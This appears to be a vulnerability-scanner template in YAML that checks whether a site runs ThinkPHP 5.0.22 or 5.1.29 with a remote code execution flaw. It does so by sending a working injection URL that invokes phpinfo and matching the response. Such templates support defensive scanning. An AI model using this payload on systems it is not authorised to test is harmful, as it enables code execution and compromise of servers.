32 lines
1.1 KiB
YAML
32 lines
1.1 KiB
YAML
id: thinkphp-5022-rce
|
|
|
|
info:
|
|
name: ThinkPHP - Remote Code Execution
|
|
author: dr_set
|
|
severity: critical
|
|
description: ThinkPHP 5.0.22 and 5.1.29 are susceptible to remote code execution if the website doesn't have mandatory routing enabled, which is the default setting. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
|
|
reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/5-rce
|
|
metadata:
|
|
max-request: 1
|
|
tags: thinkphp,rce
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "PHP Extension"
|
|
- "PHP Version"
|
|
- "ThinkPHP"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4b0a00483046022100ee65575ab1901e3f23b7c1891b8a08b0b6e5593256533a8450d227df88ab679d022100920cc2dba8c2ffb1ae53faa6ff927fe673b15ef8d2326504825b870f6d398cd5:922c64590222798bb761d5b6d8e72950
|